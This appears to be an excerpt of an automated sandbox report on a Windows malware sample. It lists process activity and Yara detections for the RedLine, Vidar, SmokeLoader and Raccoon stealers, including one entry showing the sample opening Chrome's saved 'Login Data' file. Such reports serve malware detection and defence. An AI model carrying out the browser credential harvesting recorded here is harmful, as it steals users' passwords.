Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_00421CC0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00421CC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0065A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion, 22_2_6C0065A0

Stealing of Sensitive Information:

Yara detected RedLine Stealer
Source: Yara match File source: 34.0.DataSvcUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.DataSvcUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.DataSvcUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.SMSvcHost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.DataSvcUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.DataSvcUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000000.568099425.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.634272090.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.568948579.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.566418529.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.638081498.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 15.1.8908.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.8908.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.8908.exe.2b615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.y8WngeDn4q.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.4EDC.exe.3080e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.esdfufc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.y8WngeDn4q.exe.47615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.y8WngeDn4q.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.1.esdfufc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.3.4EDC.exe.3090000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.4EDC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.esdfufc.2cb15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.412091703.0000000002091000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.482521678.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.558722900.00000000048B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.394109827.0000000002801000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.530637179.0000000004B61000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.529516403.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.411806433.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.511213614.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.482408758.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.559098642.00000000049E1000.00000004.00020000.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match File source: 29.3.E4D7.exe.48e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.E4D7.exe.48e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.E4D7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.E4D7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000002.649599129.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.553896826.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: E4D7.exe PID: 6552, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Yara detected Credential Stealer
Source: Yara match File source: 29.3.E4D7.exe.2db7106.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000003.600140112.0000000002D7E000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected RedLine Stealer
Source: Yara match File source: 34.0.DataSvcUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.DataSvcUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.DataSvcUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.SMSvcHost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.DataSvcUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.DataSvcUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000000.568099425.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.634272090.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.568948579.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.566418529.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.638081498.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 15.1.8908.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.8908.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.8908.exe.2b615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.y8WngeDn4q.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.4EDC.exe.3080e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.esdfufc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.y8WngeDn4q.exe.47615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.y8WngeDn4q.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.1.esdfufc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.3.4EDC.exe.3090000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.4EDC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.esdfufc.2cb15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.412091703.0000000002091000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.482521678.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.558722900.00000000048B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.394109827.0000000002801000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.530637179.0000000004B61000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.529516403.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.411806433.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.511213614.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.482408758.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.559098642.00000000049E1000.00000004.00020000.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match File source: 29.3.E4D7.exe.48e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.E4D7.exe.48e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.E4D7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.E4D7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000002.649599129.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.553896826.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: E4D7.exe PID: 6552, type: MEMORYSTR